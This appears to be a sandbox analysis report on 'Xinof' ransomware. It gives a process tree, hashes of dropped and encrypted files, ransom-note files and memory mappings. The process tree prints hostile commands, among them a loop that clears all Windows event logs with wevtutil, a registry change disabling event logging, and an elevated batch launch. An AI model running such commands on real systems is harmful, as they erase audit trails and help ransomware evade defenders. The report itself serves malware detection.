C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for / F "tokens=*" %%s in('wevtutil.exe el') DO wevtutil.exe cl "%%s"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start XinofSetup.bat2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K XinofSetup.bat3⤵
-
C:\Windows\system32\PING.EXEping localhost.com -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Powershell Start XinofSetup.bat -Verb Runas2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Start XinofSetup.bat -Verb Runas3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XinofSetup.bat"4⤵
-
C:\Windows\system32\PING.EXEping localhost.com -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "How To Decrypt Files.hta"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1228 -s 14001⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Explorer.EXE"C:\Windows\Explorer.EXE"2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
ed777d6bf2f684da1f71bdf0416a0d0b
SHA1ab063f4f66c16b45733ce8970a7dd0092bdc5aa1
SHA256845195c056090e889523d78541c05b45e3b955609320575bf12fec1d609802cc
SHA512116ff58e11ab0832ec37528fa258252cf10b683a9def4d613e89995f05930caac3b07527f6f2568696c8d030207296f9c3603cb41fe84b323235a859d504327e
-
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
656bdccc20db3f839533b85bc65a6988
SHA1d89780ab6609f2b2ec78a39ba202ea406f386438
SHA2566379b61717c683b70462ce36bd2cf23bd5d8a7997e4526c422ac349c527b3acf
SHA51293f1865d87c5654b5864219549a9b0172f12754ca197c9d66603f045f7b1018bcfdf4a0670a04546e0708873e0d06069442f9da1f4548ab51ed49899592a25d2
-
C:\ProgramData\SystemIDMD5
e0e278def32f4826b7b73356857940ef
SHA1a08798fe621b7a1b1add98693d9c32acedf00ad7
SHA2561177767437d1fb1878fe187fdfb9edd617d9e4027adb2d96b5f04669680584e7
SHA51208c7b74c4cbbf5ec7bac039f407735c48446f685bc539a297c534f134c73347e33982d0741e9b7f6111aee88ff4aa93948af50c0f0950706aa61c7827f70fe37
-
C:\Users\Admin\AppData\Local\Temp\Cpriv.keyMD5
a02686eda834b2bf10beb7bde11bee5b
SHA11172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Admin\AppData\Local\Temp\Cpub.keyMD5
17c81203ef0e18628d6e497a5681c76d
SHA1b0274ec1d0bc98b735959e958044d933360ec2e6
SHA256dc8cb15f68761b3b7e5409bef47c426ae36b4798d4a44dd7ba983e5a321a7f06
SHA512a60216417fe807ec25f72aea03424452be89fa9b02c0ad742faeaae7fa37b84155bc256d93694082fa6f780875476df4bde8aa4de08ceb3a80e06070f8083606
-
C:\Users\Admin\AppData\Local\Temp\FXSAPIDebugLogFile.txtMD5
03b43bfddb48c9b8fbb8910c582f2428
SHA17efd598b42dfa8ca174e04a1f5c879e9e7a78190
SHA256789712583a510f2c46b8fb1f7b0ec52d55d0d68b5849466f9f42680e0af2bed5
SHA51276958a8d05654064ec10a3431e1581f1f61c694f6a0984edb26b21bcb7cbc60023887df4ac48ef9c33a6c844f4264e44c1b60fc85b7b34e86ba4d1b92538df73
-
C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.htaMD5
f8de7da291b7fac4053eff9ba8b68ef0
SHA147f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA25695e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA5120e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Admin\AppData\Local\Temp\SystemIDMD5
e0e278def32f4826b7b73356857940ef
SHA1a08798fe621b7a1b1add98693d9c32acedf00ad7
SHA2561177767437d1fb1878fe187fdfb9edd617d9e4027adb2d96b5f04669680584e7
SHA51208c7b74c4cbbf5ec7bac039f407735c48446f685bc539a297c534f134c73347e33982d0741e9b7f6111aee88ff4aa93948af50c0f0950706aa61c7827f70fe37
-
C:\Users\Admin\AppData\Local\Temp\WPDNSE\Cpriv.keyMD5
a02686eda834b2bf10beb7bde11bee5b
SHA11172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Admin\AppData\Local\Temp\WPDNSE\Help.txtMD5
c7199085c9ebf2e72ad6c5df57edf185
SHA1ea7c6b15b2fee5ef95658ad68d62624741c9b7ef
SHA25683a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636
SHA512057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9
-
C:\Users\Admin\AppData\Local\Temp\WPDNSE\How To Decrypt Files.htaMD5
f8de7da291b7fac4053eff9ba8b68ef0
SHA147f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA25695e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA5120e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Admin\AppData\Local\Temp\XinofSetup.batMD5
e87b92b6fa7ff1c853199790b082024d
SHA163fe98f296ca56bd39c21fe1fce61586cfaf78a2
SHA256ede85eb58f52473dafe94d6911d56c4d3a23ead97753359941bd8413995fa6c5
SHA5123b51a2cceed74e8a111c473c5153220169b4fd8d17f6767b471f9b0d7cb09e6d111567bbf666ad22a28ddb62dd2b4ef28c25781dbcf0a7e1b75a36e6bbeef634
-
C:\Users\Admin\Desktop\CompareUnpublish.wma.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
a012cd308847fd7aa09afe8a3ec5fbab
SHA1aacc8ffcf664e62c22837b6712b9c3c9aa76a906
SHA256c8e95421b72ad5dc835d3b7fbe959181416d6e895c2dfa9e4381352f7f5f3384
SHA5123c90d9411c9edf585b102e16edf02294083384dd86c17252fefca0c6a573b72b9334c94a9966018d828ef55ddd944413440c20a2ecc0c0a596252a3d2c395049
-
C:\Users\Admin\Desktop\Cpriv.keyMD5
a02686eda834b2bf10beb7bde11bee5b
SHA11172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Admin\Desktop\DisconnectAdd.ttc.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
688085a04d564714efc6281cdbaf76de
SHA1c75fcfb3072e928e1669bf2d84a0e2a931970e43
SHA256a08b3457be49a375514958c84ee6cd08704afe85051642098f8af94a37f70176
SHA5124c102ececded3e951024d19cbe94e61c18c4c3a6edee72079ab4d0d2ed43c9c264ea9458ce47c2f56592af5b66e7de2a591ee46e87f5d29d30bbff3b75a2e157
-
C:\Users\Admin\Desktop\DisconnectStep.csv.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
8b8f0c341c3bb9448548558a3608d537
SHA132c867e6b903447c5460e8110322b7eff5b3425c
SHA25618d40c4de860f248b781b70ae48897870fce434d7e0d40b50737b6f77b025704
SHA512ea2fb27080c49e48abe7e17a1186d9bfd9320317e2f0af91666750e1cb9b3e6a958b0edf5399bbf72974d332e50509571f35d7ff78b4424138b42b6593d36e99
-
C:\Users\Admin\Desktop\ExpandResume.clr.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
756d2ba7f8c462340fa9ab1e4c9085bf
SHA1c99aace2f8d248a495943a0992fee762c79e32e0
SHA25641576cbe60aa0e5a9a21434d1f670288ca9dcae211dbec2f8a9985e037234dff
SHA5127ba4b54ca4f9806e2f2d3b56f8cfec16eb84d66477fabc1394a564d6ae650af5f84306dc2b21b1c2a219f206f21de9b4e5f13195121c2e09b8d45853de24482a
-
C:\Users\Admin\Desktop\ExpandSearch.vsx.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
86cccdc9a9a405e35bc2c3a6401c9f0d
SHA1b530f88eff5f35f112c5990c7d58e498776dbcfc
SHA256c5884e02c3e52ed03e7aa6dd634eb3808f75ad6adf2231cf4ddb8067de5069d7
SHA51296c277da99631c4d129039b841b64d747235c3f33ff62da28eee952ed029e552325ca46ad43f528e7b75705eb9174bfce1a19e91abf0561f1054fcced25d7318
-
C:\Users\Admin\Desktop\GroupOpen.vsd.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
4c5534d39a6112c25cbde1d72106eecc
SHA10ee889eb6c776d64b663835188688868051167de
SHA25674a4ed4dd1ae1f7938a73cf79e05cd47799f81b36652c81ebeb340764d019c76
SHA512ed39d57302ed0c5a79613201dd65bafa88568f39983caac974e3c2021c998413dc3f4e6d8b5e8f5803f1a65d1059c4b5702fa329be66144ee407471a434c1f3b
-
C:\Users\Admin\Desktop\Help.txtMD5
c7199085c9ebf2e72ad6c5df57edf185
SHA1ea7c6b15b2fee5ef95658ad68d62624741c9b7ef
SHA25683a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636
SHA512057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9
-
C:\Users\Admin\Desktop\How To Decrypt Files.htaMD5
f8de7da291b7fac4053eff9ba8b68ef0
SHA147f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA25695e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA5120e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Admin\Desktop\JoinPing.css.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
b47773e65359d3d65b9b8d562492ed1b
SHA1079b9f7021b03ca4bd90e944fe5cb1a0bc19e1b0
SHA2564a6b9157f0938c4919fe4d6f207a1f89551c9a8d4cf2df575a4436549ae30c60
SHA51259cba896ebd23c69fbf47662f857c2d26872a195cbba3b4ed94a2200565bb2db6ef9f8696e3151ff81703e26dbea624a8144027f984553b160eb2d87fd2756cf
-
C:\Users\Admin\Desktop\LockEdit.reg.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
c482f5912b956d3ae8d8d99e8782be90
SHA191fbf5c7dfc93f9be2e5d3cd18209fe8d9c13e9c
SHA256024ff162a3442fec9899ae3aac985a199711a3aaa648aca74b8356ef7f5cb16e
SHA512787abc61d2b78bc03041c3dce564a6dfdf2420ffb46425a20dfbcbcee897fbfb322d5641dafee01ddb8e44f88e3c9b71253abfee3029ccee3375120ca73ea7fb
-
C:\Users\Admin\Desktop\MeasureAdd.raw.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
02dfe570774e015d104b1d6692ceee87
SHA1f4a374d9b49b3d96f8544b73be815696eed81b66
SHA256e7c2afdcb7b432014eae7a1d0cd7640de8ed337a93ed0a50d220bb478b71ceef
SHA51269128ff98549b0e620cb271556130e4241ca8a3e439ff0409615911ef725e7880cb800d167e3dc3671689639a2da3f2384126691a3d976a072ad9a3d4182a647
-
C:\Users\Admin\Desktop\MeasureDisconnect.wmv.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
4666789d048657e21f78cc3250a31fea
SHA1f2f5da9bfc4ee3fee3bc5d5b969f5e6e4b749ad0
SHA25659bb17c27ff72e32eb0ed1e20bcbfea1a48c456f619cb8a8f15191c4af958a55
SHA5122f6cc9caaf8478e851e113b01a0046f90f566ab4d4991087f1555db5791f217b08ee854b446ece320d1a24d0d815e6546665cc20fe2987548c5d5bac3a27903a
-
C:\Users\Admin\Desktop\MergeDeny.vb.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
2a080598ad9875ae1a34c4fd97f49838
SHA19831f03acd8d8b3ea4842ffcb0c59188f1a55da7
SHA2567b520e701bb87c76c9a69837fd98dfce5f6d76c5e0fd88b8c28ec52b4eed6978
SHA5123e5f8aeca6dbfd898d62bbdb6163a8c4a23fbeae96c47159a6424ab6451be45b4307b337be7f20b3d2713814b8e9c18ca5906028af6c26767201444802b4ee98
-
C:\Users\Admin\Desktop\MountApprove.mp4.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
7a75e9d18126d883216bd49ac253af48
SHA149dd7909e1570d156a97d4bda8f099b48a5391b5
SHA256aae4985ea2fcaed80852d9b3a4b6f8e4b7d811b607097efbf5ff0f2488cf6e52
SHA512afdd0619063f53da4051437ba2ec7ac9f8e8c142f8686229acac93b93bf609fce34009e94a4d08465034baf2fd1ab1fc9ca420fe5151478ed96fa1591ef61fe7
-
C:\Users\Admin\Desktop\MoveStop.js.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
f408acde990ce3beeeed2da8f9c2ae27
SHA1192d61a49acdb5927f1dcac97a802d3cb682f1ca
SHA2561cbdbe8806a2018f65d9318840b76179a1b406e29cc041834678e221be712f02
SHA5125ac81198b04a71387eaa86c8ef88020137b0412c60a8f9ab62394622687e7e3c264c57da009506752e831c1cfc69664e35e04f1382a61fdb1a31c68c3b478407
-
C:\Users\Admin\Desktop\ProtectApprove.3gp2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
99f27d3913fda7de72277099eef727b3
SHA16295184382e9c28df30c1d7fcd0c5cbb20000cff
SHA2566011c82ee49c8f35a2c76b4bff0f06197fb6d559929c1d963840897da21997db
SHA51296e0f3c4b1afc4277e8c577c051a22e553962967498fe9d2721f442ef6ed1016325cff45c47a71629692f1715998d7aa89db4768a97eac3e82dd93f7530e429e
-
C:\Users\Admin\Desktop\RepairGrant.pptm.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
1439602f8050817c48d30452fed669ac
SHA1b512e349bd8e56f218d51b3b3b362fedd4940c1f
SHA256cf1f2eb0a5d668260f415546cf2a042697da5335d09a2ab34f377a00ddfdd432
SHA51289c283ee1540349d5459a22288c09215289e00855d8606ebe16a39617698adf31c81a480987780ef9d93475ca64beaeb87699173f6f96e7378eb8305fe6a16e1
-
C:\Users\Admin\Desktop\ResetAdd.mpv2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
a27b86c0f9080f73966e9d7c74b77b62
SHA1c00215a3886db6fd6a9d47c64187ebe34931465f
SHA256c06b29da6e7f26719d04746ebc284d257119833d0eb3c5c89f39885aec5ac635
SHA51213fd06f6cb0ef1766e556e80be4754175c6b0dd7b52ddd16fa5cbf4bc34312a17cceb819f698dcf227d75af3053791918f75a1c02726659d8d67f4ec2ba3b816
-
C:\Users\Admin\Desktop\ResetMeasure.3g2.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
bcb5a742503a0c6a367ce0dbf3f6f318
SHA1f74d633602c9f4903f05f572095b8c0e8403b64a
SHA256adaf00e92a1e2d6fdcc4f635b69818f3375fbb9f1b257feed29d3db83b5fb8b3
SHA512b129aa8a9c99756be9dc30754ee378931b9d488d3aed6cec0c87f74e8e1799d3729d275978a754bae645e18244152c032647a3ce7b685c94655038ac0f78b091
-
C:\Users\Admin\Desktop\RevokeUnlock.mpg.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
a04495f9bb81d37ee9a00f5b68d90209
SHA12607e698fbd5d63114abd5833b51e4e0af3bb17b
SHA256618d2ff1aa8fb429bf5e1b00c1df12fe5ef1c3842c7fd01fe9396ea505235dd3
SHA512219ecb403230adebbf437171e684633c6b9720664a5a2e7d6731aea736761794c79a3c089fd386120176cc1ec2fea2733651105544e4f3fcfa073fc93f121d55
-
C:\Users\Admin\Desktop\ShowUnprotect.contact.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
17cfd7e1d30289bd1ca9664415841316
SHA17331dbc587508ffe025679ba021da09fe9c99789
SHA2562da64e07f49d53d722c9cdd6c95869e65e110324f6e88261c8a7e9300bac08b3
SHA5127fd9799ebde7e93e9ab08370e883feae78b2605ced89adbccc256454a9ceab87c00959914359b2b856ece555ee7402e53e264ba35b374062edfe8cf87092ad1a
-
C:\Users\Admin\Desktop\StartSelect.exe.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
a1e472741b494bac5ffa034b6f5a3116
SHA1842c65869d676c860762976d7b733cbbac8423f8
SHA2560fd02cd2062297a48edaca62cb42de18e3a0d5237245c836157ddb476f9051e1
SHA51211bf7f5ab37fe32200f114ac5b77ccbdf3230571ced4d617e206a903f2754a15ba822c0ec15b2e43cdb0a271ab9f8a8e7a97a8aa117ee2c2e28c6928631376da
-
C:\Users\Admin\Desktop\SubmitPublish.raw.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
00c3632b2aef1f6d7d66e69519b37197
SHA19a79164cdb8a403645b7ba3e491c6609dfd95ecb
SHA2562f8f122628a04221fb4afdcf62081de2b57b89c386b5f2404bc7b4a2f4bd7339
SHA512a289567b649b6e312005dad84db0298452ec31a3df474f898e56f3ad42d7723d69bd27c0971e3362f25402f0a172b390a2c2033bfb782ea8e01444c1315e7c6e
-
C:\Users\Admin\Desktop\SubmitRepair.nfo.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
e188995a877bfcb3d3b59c3dc1da9823
SHA1cb102250ef0692b269e44eaa283bc49ce4aabd38
SHA2567ce5e21c21fd24a064761e7f11c4ec0e58bef0baf064b52eaf3145f027317994
SHA512f49133d4570595f400397e52715d32bd02981a2980ec9c55e1b616aa0ed1aa3d7d31eae61c1be6bbdd18bdec225282e82cdfcbbfea7acac3b8eac958c0ba8812
-
C:\Users\Public\Desktop\Adobe Reader 9.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
915edd10651240864f54b493e5f5880c
SHA1e53d857d71b3814dfd31ac7caf71547d88e81f94
SHA25602c6d916e42b1cc6ae04ab02374f59eaf063c83194b6058931e1ac82161c9dcd
SHA512049b747deddbd55cc19cf953e277a316444f917dcc06fde56d33838c3266d22f8af4c8924fc0cdb3dd760f9e1d5f67c55e9dde9c69aa5c1c085e49a7992d9e72
-
C:\Users\Public\Desktop\Cpriv.keyMD5
a02686eda834b2bf10beb7bde11bee5b
SHA11172e76fcc6628d80fda1ce84641dbc557f2a314
SHA256a493df2e095ef8334998b2ac782872d3fb86d41bad48708055684f82745a1b35
SHA512928ef05587071368428589a6d35fe4304b9f8c9845cd9ab24fa9d60f4b175d14aacd78965bea11520ae611b85a59df80751063a142ac2860a04304125f4d1496
-
C:\Users\Public\Desktop\Firefox.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
834a21dac3a51b0f192a6614f625c3af
SHA12a1e00815376b2d79ac2e480f5c4fd1c94ecb7e5
SHA25674a23f87bdb64bd9d1c06a262c0db7921a395bdf7f7d129134464764a068399f
SHA5126777ffec58ffb1915af3f3a24e6b8696b641d52e0295c02dfae443ab86f861f40ef17e107ae0de59e927564ad64c749259b25394ceec493cfbcc9d05e482cdf1
-
C:\Users\Public\Desktop\Google Chrome.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
04ad26376bd169a6243a05ed1782c16b
SHA1065046d56efcf5c1964b47c4eb4309a8b085e336
SHA2565956eda2ef20925375e48f7f4546333ee5ba4ea33402e82cfebda1fc54ae3b63
SHA5128c23c3c6899521bb6e3cc2ba6592a24d9510e49a6ee0df80771edc944988272f1e4288b6d5a9c2dadfa1f9a693d65ad9db7c455c46990b2621172be3f03f93c3
-
C:\Users\Public\Desktop\Help.txtMD5
c7199085c9ebf2e72ad6c5df57edf185
SHA1ea7c6b15b2fee5ef95658ad68d62624741c9b7ef
SHA25683a3ac21cfcc6069d0e4f01acb3d528ab80cec04e87e5106ef571fe8d8872636
SHA512057730155bfdb9d46bc60f68a22c6a88594fe43a8be455c719f1ccafcf790a89f5bf1ff1e9c22db19c89ef23fd31843f1e5f1d67e7aa54c262f3d65cc8a8c5c9
-
C:\Users\Public\Desktop\How To Decrypt Files.htaMD5
f8de7da291b7fac4053eff9ba8b68ef0
SHA147f2550dd4ebc56f167e1335ff5ec2f9100f863c
SHA25695e7ee01826ac22110c8966c634d772037ec25b1fd7c8a01bf1cf48dc154e998
SHA5120e759a54c9396a94ecacffdcec1b98f4f4264b815d0306f5f20d2e7c7cd7fac52e0f6c78d237da5c15fb1bcc4aa11cf18ff8f9a94c4adaf70811f0d9daf19e53
-
C:\Users\Public\Desktop\VLC media player.lnk.Email=[Thunder@fonix.email]ID=[BDD9DA39].XINOFMD5
4a625f667a5a7e7b895e6d3652123242
SHA18d96d38b83e249b85f8c9486602085a4c0c82ce4
SHA256202b8e318f66aadbc53f64e52414d0a8d462ed8473a8636f392360f6f955595c
SHA512d455149a5d427e9aa84e498e375d2721ecb7d4ab9458cb65605a7cb89322619e7c221865c06c24326978d59fd3298a27db50329b11964c057ca647692476848f
-
memory/108-216-0x0000000000000000-mapping.dmp
-
memory/112-2-0x0000000000000000-mapping.dmp
-
memory/208-329-0x0000000000000000-mapping.dmp
-
memory/220-330-0x0000000000000000-mapping.dmp
-
memory/232-331-0x0000000000000000-mapping.dmp
-
memory/292-170-0x0000000000000000-mapping.dmp
-
memory/296-215-0x0000000000000000-mapping.dmp
-
memory/296-178-0x0000000000000000-mapping.dmp
-
memory/316-156-0x00000000029E0000-0x00000000029F1000-memory.dmpFilesize
68KB
-
memory/316-155-0x00000000029E0000-0x00000000029F1000-memory.dmpFilesize
68KB
-
memory/316-154-0x0000000001EC0000-0x0000000001ED1000-memory.dmpFilesize
68KB
-
memory/316-306-0x0000000000000000-mapping.dmp
-
memory/388-1-0x0000000000000000-mapping.dmp
-
memory/432-300-0x0000000000000000-mapping.dmp
-
memory/432-213-0x0000000000000000-mapping.dmp
-
memory/548-174-0x0000000000000000-mapping.dmp
-
memory/568-238-0x0000000000000000-mapping.dmp
-
memory/568-173-0x0000000000000000-mapping.dmp
-
memory/576-288-0x0000000000000000-mapping.dmp
-
memory/576-203-0x0000000000000000-mapping.dmp
-
memory/592-325-0x0000000000000000-mapping.dmp
-
memory/612-352-0x0000000000000000-mapping.dmp
-
memory/612-158-0x0000000000000000-mapping.dmp
-
memory/620-323-0x0000000000000000-mapping.dmp
-
memory/656-225-0x0000000000000000-mapping.dmp
-
memory/656-319-0x0000000000000000-mapping.dmp
-
memory/656-192-0x0000000000000000-mapping.dmp
-
memory/680-169-0x0000000000000000-mapping.dmp
-
memory/732-224-0x0000000000000000-mapping.dmp
-
memory/736-3-0x0000000000000000-mapping.dmp
-
memory/736-333-0x0000000000000000-mapping.dmp
-
memory/740-334-0x0000000000000000-mapping.dmp
-
memory/740-162-0x0000000000000000-mapping.dmp
-
memory/788-191-0x0000000000000000-mapping.dmp
-
memory/788-313-0x0000000000000000-mapping.dmp
-
memory/788-223-0x0000000000000000-mapping.dmp
-
memory/808-239-0x0000000000000000-mapping.dmp
-
memory/808-175-0x0000000000000000-mapping.dmp
-
memory/812-354-0x0000000000000000-mapping.dmp
-
memory/820-180-0x0000000000000000-mapping.dmp
-
memory/820-217-0x0000000000000000-mapping.dmp
-
memory/844-171-0x0000000000000000-mapping.dmp
-
memory/852-312-0x0000000000000000-mapping.dmp
-
memory/868-205-0x0000000000000000-mapping.dmp
-
memory/868-322-0x0000000000000000-mapping.dmp
-
memory/904-351-0x0000000000000000-mapping.dmp
-
memory/916-278-0x0000000000000000-mapping.dmp
-
memory/924-188-0x0000000000000000-mapping.dmp
-
memory/1016-0-0x0000000000000000-mapping.dmp
-
memory/1028-332-0x0000000000000000-mapping.dmp
-
memory/1032-6-0x0000000000000000-mapping.dmp
-
memory/1032-275-0x0000000000000000-mapping.dmp
-
memory/1036-5-0x0000000000000000-mapping.dmp
-
memory/1060-221-0x0000000000000000-mapping.dmp
-
memory/1108-294-0x0000000000000000-mapping.dmp
-
memory/1112-4-0x0000000000000000-mapping.dmp
-
memory/1112-194-0x0000000000000000-mapping.dmp
-
memory/1120-289-0x0000000000000000-mapping.dmp
-
memory/1136-237-0x0000000000000000-mapping.dmp
-
memory/1136-202-0x0000000000000000-mapping.dmp
-
memory/1148-206-0x0000000000000000-mapping.dmp
-
memory/1156-232-0x0000000002B00000-0x0000000002B01000-memory.dmpFilesize
4KB
-
memory/1156-227-0x0000000002B00000-0x0000000002B01000-memory.dmpFilesize
4KB
-
memory/1156-231-0x0000000002A90000-0x0000000002A91000-memory.dmpFilesize
4KB
-
memory/1156-183-0x0000000000000000-mapping.dmp
-
memory/1156-218-0x0000000000000000-mapping.dmp
-
memory/1212-214-0x0000000000000000-mapping.dmp
-
memory/1212-295-0x0000000000000000-mapping.dmp
-
memory/1212-328-0x0000000000000000-mapping.dmp
-
memory/1228-308-0x0000000000000000-mapping.dmp
-
memory/1248-211-0x0000000000000000-mapping.dmp
-
memory/1256-336-0x0000000000000000-mapping.dmp
-
memory/1264-321-0x0000000000000000-mapping.dmp
-
memory/1276-189-0x0000000000000000-mapping.dmp
-
memory/1296-10-0x0000000000000000-mapping.dmp
-
memory/1296-163-0x0000000000000000-mapping.dmp
-
memory/1328-297-0x0000000000000000-mapping.dmp
-
memory/1332-220-0x0000000000000000-mapping.dmp
-
memory/1340-201-0x0000000000000000-mapping.dmp
-
memory/1340-150-0x0000000000000000-mapping.dmp
-
memory/1340-290-0x0000000000000000-mapping.dmp
-
memory/1340-236-0x0000000000000000-mapping.dmp
-
memory/1340-324-0x0000000000000000-mapping.dmp
-
memory/1352-302-0x0000000000000000-mapping.dmp
-
memory/1352-179-0x0000000000000000-mapping.dmp
-
memory/1356-207-0x0000000000000000-mapping.dmp
-
memory/1376-285-0x0000000000000000-mapping.dmp
-
memory/1376-17-0x0000000000000000-mapping.dmp
-
memory/1384-139-0x0000000000000000-mapping.dmp
-
memory/1384-282-0x0000000000000000-mapping.dmp
-
memory/1388-187-0x0000000000000000-mapping.dmp
-
memory/1388-309-0x0000000000000000-mapping.dmp
-
memory/1388-277-0x0000000000000000-mapping.dmp
-
memory/1408-210-0x0000000000000000-mapping.dmp
-
memory/1416-298-0x0000000000000000-mapping.dmp
-
memory/1428-301-0x0000000000000000-mapping.dmp
-
memory/1432-299-0x0000000000000000-mapping.dmp
-
memory/1436-342-0x0000000000000000-mapping.dmp
-
memory/1444-338-0x0000000000000000-mapping.dmp
-
memory/1448-307-0x0000000000000000-mapping.dmp
-
memory/1456-176-0x0000000000000000-mapping.dmp
-
memory/1468-337-0x0000000000000000-mapping.dmp
-
memory/1468-296-0x0000000000000000-mapping.dmp
-
memory/1472-160-0x0000000000000000-mapping.dmp
-
memory/1472-335-0x0000000000000000-mapping.dmp
-
memory/1472-159-0x0000000000000000-mapping.dmp
-
memory/1476-314-0x0000000000000000-mapping.dmp
-
memory/1476-281-0x0000000000000000-mapping.dmp
-
memory/1476-350-0x0000000000000000-mapping.dmp
-
memory/1488-222-0x0000000000000000-mapping.dmp
-
memory/1492-19-0x0000000002080000-0x0000000002091000-memory.dmpFilesize
68KB
-
memory/1492-18-0x0000000001C70000-0x0000000001C81000-memory.dmpFilesize
68KB
-
memory/1492-20-0x0000000001C70000-0x0000000001C81000-memory.dmpFilesize
68KB
-
memory/1504-172-0x0000000000000000-mapping.dmp
-
